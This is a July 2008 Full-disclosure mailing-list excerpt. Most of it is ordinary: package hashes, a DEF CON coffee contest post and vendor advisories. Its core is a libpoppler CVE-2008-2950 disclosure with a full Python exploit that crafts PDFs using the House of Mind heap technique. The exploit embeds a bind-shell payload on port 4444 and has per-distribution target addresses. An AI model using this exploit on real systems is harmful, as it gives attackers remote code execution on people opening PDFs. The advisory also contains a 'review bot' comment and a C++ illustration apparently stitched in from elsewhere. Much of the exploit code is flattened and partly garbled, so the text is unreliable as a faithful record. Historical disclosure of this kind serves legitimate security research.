http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 281936 b97f8461fb12702ffde3b1536e11531c http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 116124 cf6ec9328492c928d5d8064f09d5bcda http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 1178958 
f21fed7bb01a12a74061b3cf03000b54 http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 26652 b650866c75829e84f35592fff5d6c950 http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 500058 d99f74a53d5b2b6167eae4bd9f56d3ed http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 127824 c93136898c8ce5f8ac90ba46daacc015 http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 22688 e69b52b3505b614f95836502f06bd1ac http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 38792 3167cb62f05d65b3971cc90f1093cd6a http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 38984 92a1a25f10ed41b0bd3a25699e5d76ff http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_sparc.deb Size/MD5: 169952 3656ebd36bb152e7e18c984f0d8a31fe -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 227 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080708/52627f45/attachment.bin From foofus at foofus.net Tue Jul 8 22:44:27 2008 
From: foofus at foofus.net (foofus at foofus.net)
Date: Tue, 8 Jul 2008 14:44:27 -0700 (PDT)
Subject: [Full-disclosure] Coffee Wars 9 : Call for Beans
Message-ID: <33916.209.59.46.11.1215553467.squirrel@webmail.foofus.net>

In addition to whatever other insanity flourishes at Defcon each year, the last eight years have been witness to the amazing and ridiculous contest known as CoffeeWars. This single ludicrous event is really two contests. The first, and most important, is the attempt to select the finest coffee from all of hacker culture. The second is the loopy part: to find the upper limit on how much coffee the staff can drink.

Every year, we succeed at the first task. Every year, we fail at the second. Here is a useful list of key factors contributing to the outbreak of coffee wars throughout history:

1 - because the Kona/JBM debate had to be settled
2 - because once was not enough
3 - because we went a little crazy
4 - because people responded to our brand of crazy
5 - because it is now an institution
6 - because we're actually getting good at running it
7 - because each year the competition gets more intense
8 - because of popular demand
9 - because you haven't yet had a chance to test your beans

What's that, you say? You only recall eight coffee wars? And the list mentions a ninth? Very attentive of you, dear reader. The ninth coffee war will take place exactly when you would expect: on Friday, 8 Aug 2008, at the Riviera, at the opening of the con.

The rules remain as few and as simple as we can manage:

A. Whole coffee beans only: nothing ground, powdered, aerosolized, crystallized, liquified, etc. Just beans. If you submit something other than beans, it won't count as an entry.

B. Unflavored beans only: we are trying to evaluate coffee, not somebody's science experiment. If you submit flavored coffee (and this includes stuff with chicory or for that matter any non-coffee ingredient), it won't count as an entry.

C. No decaf. Seriously, submitting decaf to Coffee Wars is like entering your Ford Granada* in the Indy 500-- it might technically be a car, and maybe it can actually complete a 500-mile distance, but it detracts from the whole experience for everyone.

D. Time is critical. A coffee war lasts only a couple of hours, and it turns out there are limits on the intake capacity of the judges. If you wish to enter, you need to get your coffee to us at or before the opening of the contest area. If you want to get your coffee back, you need to make a plan for this when you submit it-- otherwise it will become part of the CoffeeWars legacy. [secret message to G Mark: it was agonizing having to turn away your entry last year solely because of timing]

E. Volume is also important. We need to have enough coffee beans to brew two pots, plus have some beans left to pass around for inspection and smelling. 1/2 lb is a good amount; less than 1/4 lb is probably not enough. If your coffee is really, really good, you probably should submit as much as possible... [secret message to G Mark: come on man, make with the Kona!]

Hey, look! In the Defcon contest area! It's CoffeeWars! Grab your glocks and call the cops. Wait, no. That's what you're supposed to do when you see Tupac. When you see CoffeeWars, you are supposed to submit your best coffee beans for judgment, in the hope that you will be awarded a much-coveted prize, plus 3.5 seconds of loving from the crowd at the closing ceremony.

What do you say? Is your coffee good enough to endure the blazing crucible of CoffeeWars 9? Will you join the previous eight winners in glory?

Only one way to find out, friend. So mobilize your beans and enter.

--Foofus.

* If you have actually driven a Ford Granada, well, you know what we mean.

From cesarc56 at yahoo.com Wed Jul 9 00:26:11 2008
From: cesarc56 at yahoo.com (Cesar)
Date: Tue, 8 Jul 2008 16:26:11 -0700 (PDT)
Subject: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability
In-Reply-To: <4873D9A5.5070508@idefense.com>
Message-ID: <918334.45595.qm@web54402.mail.yahoo.com>

Just to clarify, the following SQL Server vulnerabilities:

SQL Server Buffer Overrun Vulnerability - CVE-2008-0106
SQL Server Memory Corruption Vulnerability - CVE-2008-0107
Convert Buffer Overrun - CVE-2008-0086

can be exploited to take complete control of the system on Windows 2003; it doesn't matter which user account the SQL Server service is running under. On Windows 2008, if the service is running under the Network Service or Local Service account, then full system compromise is always possible.

*see http://www.argeniss.com/research/TokenKidnapping.pdf

Cesar.

--- On Tue, 7/8/08, iDefense Labs wrote:

> From: iDefense Labs
> Subject: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability
> To: vulnwatch at vulnwatch.org, full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com
> Date: Tuesday, July 8, 2008, 11:18 PM
> iDefense Security Advisory 07.08.08
> http://labs.idefense.com/intelligence/vulnerabilities/
> Jul 08, 2008
>
> I. BACKGROUND
>
> SQL Server is Microsoft's database server product. It supports the
> restoration and inspection of backups via SQL statements. For more
> information see the vendor's website found at the following URL.
>
> http://www.microsoft.com/sql/default.mspx

From fmanzano at fceia.unr.edu.ar Wed Jul 9 00:37:49 2008
From: fmanzano at fceia.unr.edu.ar (Felipe Andres Manzano)
Date: Tue, 8 Jul 2008 20:37:49 -0300 (ART)
Subject: [Full-disclosure] #2008-007 libpoppler uninitialized pointer - POC
Message-ID: <63960.24.232.92.119.1215560269.squirrel@www.fceia.unr.edu.ar>

hi. I was in doubt about releasing this because there is no official patch. I suppose at this point anyone could accomplish the same thing so, again, I'm in doubt. A friend once told me that if in doubt take your pants off. I've already tried that and I didn't earn no resolution to my conflict so.. I thought I should try the internet version of that strategy. So here we are, enjoy...

f/

'''
#OCERT ADV
#2008-007 libpoppler uninitialized pointer

Description:

The poppler PDF rendering library suffers a memory management bug which leads to arbitrary code execution.

The vulnerability is present in the Page class constructor/destructor. The pageWidgets object is not initialized in the Page constructor if specific conditions are met, but it is deleted afterwards in the destructor regardless of its initialization. Specific PDF files can be crafted which allocate arbitrary memory to trigger the vulnerability.

A new poppler version addressing the issue is scheduled to be released on July 30th according to maintainer.

The following patch fixes the issue:

diff --git a/poppler/Page.cc b/poppler/Page.cc index b28a3ee..72a706b 100644 --- a/poppler/Page.cc +++ b/poppler/Page.cc
@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) { Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { Object tmp; - + pageWidgets = NULL; //Security fix ok = gTrue; xref = xrefA; num = numA;

Affected version: Poppler <= 0.8.4

Fixed version: Poppler, N/A

Credit: vulnerability report, patch and PoC code received from Felipe Andres Manzano.

CVE: CVE-2008-2950

Timeline:
2008-06-27: vulnerability report received
2008-06-28: contacted poppler maintainers and affected vendors
2008-06-30: maintainer confirms issue and patch
2008-07-07: advisory release

References:

Permalink: http://www.ocert.org/advisories/ocert-2008-007.html

####END OCERT

Summary:
========

The libpoppler PDF rendering library can free uninitialized pointers, leading to arbitrary code execution. This vulnerability results from memory management bugs in the Page class constructor/destructor.

Technical Description - Exploit/Concept Code:
=============================================

Tests were performed using the libpoppler util pdftotext taken from git://git.freedesktop.org/git/poppler/poppler. Other versions were tried successfully (the ones shipped with debian/gentoo).

In the initialization of a Page object and under certain conditions a member object skips initialization, but then is eventually deleted. This can lead to the situation in which an arbitrary pointer is passed to the libc free, and so it becomes appropriate for the malloc maleficarum to enter the scene.

Look at the Page class constructor on Page.cc:231. First, at the beginning of the function the member object pageWidgets isn't initialized; then it tries to check if the type of the annotations proposed in the pdf file is correct; if not, it bails out to the label err2. Note that if some discordance in the type of the annotation arises, the member variable pageWidgets is never initialized!
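Review bot: in the hunk against Page::Page, the added "pageWidgets = NULL; //Security fix" covers the "goto err2" path, but the comment gives a maintainer nothing to act on. Suggest a comment that names the invariant: ~Page() runs "delete pageWidgets" unconditionally, so the member has to be null until "new FormPageWidgets(...)" has run. Consider setting it in the constructor's member initializer list instead, so that any exit later added above this line is covered as well. The hunk also overwrites the blank line after "Object tmp;" rather than adding a line, which removes the separation between the declaration and the assignments.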
Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) {
  Object tmp;
[...]
  // annotations
  pageDict->lookupNF("Annots", &annots);
  if (!(annots.isRef() || annots.isArray() || annots.isNull())) {
    error(-1, "Page annotations object (page %d) is wrong type (%s)",
          num, annots.getTypeName());
    annots.free();
    goto err2;
  }

  // forms
  pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form);
  tmp.free();
[...]
 err2:
  annots.initNull();
 err1:
  contents.initNull();
  ok = gFalse;
}

But in the Page class destructor, Page.cc:309, pageWidgets is deleted without any consideration. The Page destructor is immediately called after the erroneous Page construction.

Page::~Page() {
  delete pageWidgets;
  delete attrs;
  annots.free();
  contents.free();
}

It is worth mentioning that the pdf rendering scenario is friendly with the heap massage techniques because you will find lots of ways to allocate or allocate/free memory in the already provided functionality. In the POC I have repeatedly used the 'name' of the fields of a pdf dictionary to allocate memory. Each name allocates up to 127 bytes and apparently there is no limit on the number of fields.

The following excerpt is a sample verification of the existence of the problem:

localhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext >test.pdf
localhost expl-poppler # pdftotext test.pdf
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Annotation rectangle is wrong type
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Page annotations object (page 3) is wrong type (integer)
Error: Page count in top-level pages object is incorrect
Error: Couldnt read page catalog
Trace/breakpoint trap

:)

Further research should be done to accommodate the heap for other applications like evince:

localhost expl-poppler # evince test.pdf

(evince:8912): GnomeUI-WARNING **: While connecting to session manager:
Authentication Rejected, reason : None of the authentication protocols specified are supported and host-based authentication failed.

** (evince:8912): WARNING **: Service registration failed.

** (evince:8912): WARNING **: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Annotation rectangle is wrong type
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Bad bounding box for annotation
Error: Page annotations object (page 3) is wrong type (integer)
*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 ***

Note that 0x08100468 is still a provided pointer. But in this try some malloc structure like _heap_info (see house of mind) is not correctly aligned any more. Maybe evince-thumbnailer, which is (probably) monothreaded, is an easier target.

Patch
=====

diff --git a/poppler/Page.cc b/poppler/Page.cc index b28a3ee..72a706b 100644 --- a/poppler/Page.cc +++ b/poppler/Page.cc
@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) { Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { Object tmp; - + pageWidgets = NULL; //Security fix ok = gTrue; xref = xrefA; num = numA;

POC:
===

Written in pyploit. It can be used 2 ways: one selecting a preconfigured target like *gentoo-pdftotext*, or the other in which you could pass some malloc/free execution trace modifying parameters.
'''
##########################################################################
#### Felipe Andres Manzano * fmanzano at fceia.unr.edu.ar ####
#### some shit on http://felipe.andres.manzano.googlepages.com/home ####
##########################################################################
import struct
import struct
import math
import os
import sys

## print "%.400f"%d wont work :( ... so a quick double printing class
class Doubles:
    def __init__(self, precision=400):
        self.precision=precision

    def pdficateint(self,i1,i2):
        s = struct.pack("@L",i1) + struct.pack("@L",i2)
        return self.pdficatestr(s)

    def pdficate(self,s):
        rslt = " "
        for pos in range (0,len(s)/8):
            rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+" "
        return rslt;

    def pdficatestr(self, s):
        d = struct.unpack("d",s)[0]
        rslt=" "
        if(d<0.0):
            rslt+="-"
            d=-d
        rslt+="%d."%int(math.floor(d))
        myd=math.floor(d)
        scale=0.1
        nines=0
        for p in range(1,self.precision):
            for i in range(1,10):
                if (myd+scale*i) > d:
                    i-=1
                    break
            if i==9:
                if nines>6:
                    return rslt
                else:
                    nines+=1
            else:
                nines=0
            rslt+=("%02d"%i)[1]
            myd+=scale* i
            scale=scale*0.1
        return rslt

##From Malloc maleficarum
##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt
class HouseOfMind:
    HEAP_MAX_SIZE=(1024*1024)
    JMP='\xeb'
    NOP='\x90'
    PAD='\x00'
    PREV_INUSE=0x1
    IS_MMAPPED=0x2
    NON_MAIN_ARENA=0x4

    def __init__(self, base, where, payload, entrypoint):
        self.base=base
        self.where=where-0xc
        self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1)
        self.payload=payload
        self.entrypoint=entrypoint
self.chunkaddress=0 if (self.entrypoint > 0xff - 8): throw ## lendian, 32bit only ## See The Malloc Maleficarum / House of Mind def mind(self): rslt = "" #first we add padding to reach the next Heap border rslt+=self.PAD*(self.heap_info-self.base) #now we add a _heap_info pinting to a malloc_state of our own #and dictating a generous size for this *heap* ##arena.c:59 //struct _heap_info rslt += struct.pack(" unlocked. rslt += struct.pack(" +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Size of previous chunk, if allocated | | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Size of chunk, in bytes |M|P| # mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | User data starts here... . # . . # . (malloc_usable_size() bytes) . # . | #nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Size of chunk | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ #chunk 0 There isn't a single reason for this to exist * wabaaaaaaaaaa! 
# rslt += struct.pack(">\nstream...\nendstream\n"])) catalog = PDFDict() catalog.add("Type", PDFName("Catalog")) catalog.add("Outlines", "3 0 R") catalog.add("Pages", "4 0 R") catalog.add("AcroForm", "<>") #for i in range(0,1000): # catalog.add( "C"*82 + "%05d"%i, 0) outlines = PDFDict() outlines.add("Type", PDFName("Outlines")) outlines.add("Count",0) pages = PDFDict() pages.add("Type", PDFName("Pages")) pages.add("Kids","[ 8 0 R 6 0 R 5 0 R ]") pages.add("Count","3") doc.add(PDFObject([catalog])) doc.add(PDFObject([outlines])) doc.add(PDFObject([pages])) page1 = PDFDict() page1.add("Type", PDFName("Page")) page1.add("Parent", "4 0 R") page1.add("MediaBox","[ 0 0 612 792 ]") page1.add("Contents", "1 0 R") page1.add("Resources", "<< /ProcSet 6 0 R >>") page1.add("Annots", "0") #malloc-fill-free lots of chunks of the size then used by Page class(88) for pagesize in range(88,126): payload = ("".join(["#%02x"%ord(struct.pack("@L",hm.chunkaddress)[i]) for i in range (0,4)]))*19 payload += "B"*(pagesize-(len(payload)/3)) for i in range(0,10): page1.add(payload, 0) doc.add(PDFObject([page1])) page1 = PDFDict() page1.add("Type", PDFName("Page")) page1.add("Parent", "4 0 R") page1.add("MediaBox","[ 0 0 612 792 ]") page1.add("Contents", "1 0 R") page1.add("Resources", "<< /ProcSet 6 0 R >>") page1.add("Annots", "[7 0 R 7 0 R 7 0 R 7 0 R]") #massage session 1 size=127 for i in range(0,massage[0]): page1.add( "A"*(size-5)+("%05d"%(i)), "B"*size) doc.add(PDFObject([page1])) annots = PDFDict() annots.add("Subtype","/Text") annots.add("BS", "<? 
"0.0 "*massage[2] + " ]>>") annots.add("FT", "/Tx") doc.add(PDFObject([annots])) page1 = PDFDict() page1.add("Type", PDFName("Page")) page1.add("Parent", "4 0 R") page1.add("MediaBox","[ 0 0 612 792 ]") page1.add("Contents", "1 0 R") page1.add("Resources", "<< /ProcSet 6 0 R >>") page1.add("Annots", "[7 0 R]") doc.add(PDFObject([page1])) doc.add(PDFObject(["<<>>"])) doc.add(PDFObject(["[ /PDF ]"])) return doc.__str__() ##Main ## Not every shellcode will work by now ## Only the ones that taken by 8bytes form an ieee754 double presicion float ## with an exponent not too positive ... :) ## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com scode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" scode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" scode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" scode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" scode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" scode += "\x89\xe1\xcd\x80" #expl = PopplerExpl( ('\xcc'+'\x90')*((160-16)/2)) expl = PopplerExpl(scode) targets = { "gentoo-pdftotext":(0x08100000, 0x804c014, 1863, 20, 400), "debian4-pdftotext":(0x08100000, 0x804bb18, 1879, 33, 400), "gentoo-evince-thumbnailer": (0x8100000, 0x080712c4, 907, 34, 200), } if len( sys.argv )==1: print "Comments -> fmanzano at fceia.unr.edu.ar" print "Usage 1:" print " %s "%sys.argv[0], targets.keys() print "Usage 2:" print " %s massage1 massage2 massage3 base got"%sys.argv[0] print " The idea here is to align the _heap_info struct that commences with 0x08?00010 " print " to the address 0x8?0000. For this pourpose move massage1/2/3. " print " THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW APPS !" 
print " base is the 1024*1024 bytes aligned address to which we are trying to align everything" print " got is the addres of the got where the thing is going to write the shellcode address" print " BTW by now the shellcode is nop;int 3;nop...grooovy!.. NOT" elif len( sys.argv )>2: print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))) else: #base: the expected heap limit (08100000,08200000,....08f00000... ) #got: address of the got entry to change #chinesse massage base,got,massage1,massage2,massage3 = targets[sys.argv[1]] print expl.make(base,got,(massage1,massage2,massage3)) #thnks A From joe at pjprimer.com Wed Jul 9 00:53:35 2008 
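The constructor/destructor mismatch described in the libpoppler advisory above (oCERT #2008-007), as an added illustration that is not part of the original post and is not poppler code. `Widgets`, `PageMemory`, `constructPage`, `freedPointer` and `SafePage` are hypothetical names and the stale value is constructed; the block models which pointer the destructor would free before and after the one-line patch, then goes one step beyond the patch by holding the member in a `std::unique_ptr`.

```cpp
// Added illustration of the bug class in oCERT #2008-007; not poppler code.
// Every type and function name below is a hypothetical stand-in.
#include <cstdint>
#include <cstdio>
#include <memory>

// Stand-in for FormPageWidgets. It counts live objects so a caller can
// check that nothing leaks and nothing is released twice.
struct Widgets {
    static int live;
    Widgets() { ++live; }
    ~Widgets() { --live; }
};
int Widgets::live = 0;

// Types the quoted constructor accepts for Annots, plus the integer that
// produced "is wrong type (integer)" in the quoted pdftotext output.
enum class AnnotsType { Ref, Array, Null, Integer };

static bool annotsTypeOk(AnnotsType t) {
    return t == AnnotsType::Ref || t == AnnotsType::Array ||
           t == AnnotsType::Null;
}

// Part 1: model of the memory a Page object is built in. The field is a
// plain integer pre-filled by the caller, which keeps the "before" case
// well-defined C++ while showing what the destructor would receive.
struct PageMemory {
    std::uintptr_t pageWidgets;  // left over from the chunk's previous use
    bool ok;
};

enum class Variant { BeforePatch, AfterPatch };

// Follows the control flow of Page::Page as quoted in the advisory.
// widgetsAddr stands for the result of "new FormPageWidgets(...)".
void constructPage(PageMemory &mem, AnnotsType annots, Variant v,
                   std::uintptr_t widgetsAddr) {
    if (v == Variant::AfterPatch)
        mem.pageWidgets = 0;       // "pageWidgets = NULL;" from the patch
    mem.ok = true;
    if (!annotsTypeOk(annots)) {   // wrong type: the "goto err2" path
        mem.ok = false;
        return;                    // the assignment below is skipped
    }
    mem.pageWidgets = widgetsAddr;
}

// Builds a page on top of stale memory and returns the address that
// "delete pageWidgets" in ~Page() would then operate on.
std::uintptr_t freedPointer(Variant v, AnnotsType annots,
                            std::uintptr_t stale) {
    PageMemory mem{stale, false};
    constructPage(mem, annots, v, 0x1000);  // 0x1000: constructed address
    return mem.pageWidgets;
}

// Part 2: the same shape with ownership expressed in the type. A
// unique_ptr member is null before the constructor body runs, so every
// exit path, including ones added later, leaves the destructor safe.
class SafePage {
public:
    explicit SafePage(AnnotsType annots) : ok_(annotsTypeOk(annots)) {
        if (!ok_) return;                        // early exit, nothing to undo
        widgets_ = std::make_unique<Widgets>();
    }
    bool ok() const { return ok_; }
    bool hasWidgets() const { return widgets_ != nullptr; }
private:
    bool ok_;
    std::unique_ptr<Widgets> widgets_;           // released automatically
};

// Runs the failing and the succeeding path of SafePage and returns how
// many Widgets are still alive afterwards (0: no leak, no double release).
int liveWidgetsAfterBothPaths() {
    { SafePage bad(AnnotsType::Integer); }
    { SafePage good(AnnotsType::Array); }
    return Widgets::live;
}

int main() {
    const std::uintptr_t stale = 0x41414141;     // constructed leftover value
    std::printf("before patch, integer Annots: delete(%#lx)\n",
                (unsigned long)freedPointer(Variant::BeforePatch,
                                            AnnotsType::Integer, stale));
    std::printf("after patch,  integer Annots: delete(%#lx)\n",
                (unsigned long)freedPointer(Variant::AfterPatch,
                                            AnnotsType::Integer, stale));
    std::printf("live Widgets after SafePage runs: %d\n",
                liveWidgetsAfterBothPaths());
    return 0;
}
```

Building real code of this shape with AddressSanitizer or running it under Valgrind reports the invalid free on the error path, which is a quick regression check for the patched constructor.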
From: joe at pjprimer.com (Joe Barr)
Date: Tue, 08 Jul 2008 18:53:35 -0500
Subject: [Full-disclosure] Coffee Wars 9 : Call for Beans
In-Reply-To: <33916.209.59.46.11.1215553467.squirrel@webmail.foofus.net>
References: <33916.209.59.46.11.1215553467.squirrel@webmail.foofus.net>
Message-ID: <1215561215.5825.190.camel@Desktop>

After missing the grand prize last year by only *that much, I'm thinking
of trying again. If there are fewer competitors this year, there is a
good chance I can improve my score. If there's more, well, that remains
to be seen.

On Tue, 2008-07-08 at 14:44 -0700, foofus at foofus.net wrote:
> In addition to whatever other insanity flourishes at Defcon each
> year, the last eight years have been witness to the amazing and
> ridiculous contest known as CoffeeWars. This single ludicrous
> event is really two contests. The first, and most important, is
> the attempt to select the finest coffee from all of hacker culture.
> The second is the loopy part: to find the upper limit on how much
> coffee the staff can drink.
>
> Every year, we succeed at the first task. Every year, we fail at
> the second. Here is a useful list of key factors contributing to
> the outbreak of coffee wars throughout history:
>
> 1 - because the Kona/JBM debate had to be settled
> 2 - because once was not enough
> 3 - because we went a little crazy
> 4 - because people responded to our brand of crazy
> 5 - because it is now an institution
> 6 - because we're actually getting good at running it
> 7 - because each year the competition gets more intense
> 8 - because of popular demand
> 9 - because you haven't yet had a chance to test your beans
>
> What's that, you say? You only recall eight coffee wars? And the
> list mentions a ninth? Very attentive of you, dear reader. The
> ninth coffee war will take place exactly when you would expect: on
> Friday, 8 Aug 2008, at the Riviera, at the opening of the con.
>
> The rules remain as few and as simple as we can manage:
>
> A. Whole coffee beans only: nothing ground, powdered,
>    aerosolized, crystallized, liquified, etc. Just
>    beans. If you submit something other than beans,
>    it won't count as an entry.
> B. Unflavored beans only: we are trying to evaluate
>    coffee, not somebody's science experiment. If you
>    submit flavored coffee (and this includes stuff
>    with chicory or for that matter any non-coffee
>    ingredient), it won't count as an entry.
> C. No decaf. Seriously, submitting decaf to Coffee
>    Wars is like entering your Ford Granada* in the
>    Indy 500-- it might technically be a car, and maybe
>    it can actually complete a 500-mile distance, but
>    it detracts from the whole experience for everyone.
> D. Time is critical. A coffee war lasts only a couple
>    of hours, and it turns out there are limits on the
>    intake capacity of the judges. If you wish to
>    enter, you need to get your coffee to us at or
>    before the opening of the contest area. If you
>    want to get your coffee back, you need to make a
>    plan for this when you submit it-- otherwise it
>    will become part of the CoffeeWars legacy. [secret
>    message to G Mark: it was agonizing having to turn
>    away your entry last year solely because of timing]
> E. Volume is also important. We need to have enough
>    coffee beans to brew two pots, plus have some beans
>    left to pass around for inspection and smelling. 1/2
>    lb is a good amount; less than 1/4 lb is probably
>    not enough. If your coffee is really, really good,
>    you probably should submit as much as possible...
>    [secret message to G Mark: come on man, make with
>    the Kona!]
>
> Hey, look! In the Defcon contest area! It's CoffeeWars! Grab your
> glocks and call the cops. Wait, no. That's what you're supposed to
> do when you see Tupac. When you see CoffeeWars, you are supposed to
> submit your best coffee beans for judgment, in the hope that you will
> be awarded a much-coveted prize, plus 3.5 seconds of loving from the
> crowd at the closing ceremony.
>
> What do you say? Is your coffee good enough to endure the blazing
> crucible of CoffeeWars 9? Will you join the previous eight winners
> in glory?
>
> Only one way to find out, friend. So mobilize your beans and enter.
>
> --Foofus.
>
> * If you have actually driven a Ford Granada, well, you know what we
> mean.
>
>
>
--
One of the advantages of being disorderly is that one is constantly
making exciting discoveries.
A. A. Milne

From security at mandriva.com Wed Jul 9 01:23:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 08 Jul 2008 18:23:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:137 ] - Updated OpenOffice.org fix vulnerability, and a few other bugs
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:137
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : openoffice.org
 Date    : July 8, 2008
 Affected: 2008.1
 _______________________________________________________________________

 Problem Description:

 Integer overflow in the rtl_allocateMemory function in
 sal/rtl/source/alloc_global.c in OpenOffice.org (OOo) 2.0 through
 2.4 allows remote attackers to execute arbitrary code via a crafted
 file that triggers a heap-based buffer overflow. (CVE-2008-2152)

 Also, according to bug #38874 decimal numbers on Hebrew documents
 would appear as Arabic characters.

 Another issue (#39799) is with measurement units configuration to
 format paragraphs on the menu: (Tools -> Options -> OpenOffice.org
 Writer -> General). Even setting to centimeters on (Indent & Spacing)
 option it shows as characters (ch) on (Indents & Spacing)
 configuration on the menu: (Format -> Paragraph -> Indents & Spacing).

 Moreover, a document holding Notes edited on Microsoft Office would
 not show when opened with OpenOffice.

 These and a number of other OpenOffice.org issues were fixed by the
 new version provided in this update.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2152
 _______________________________________________________________________

 Updated Packages: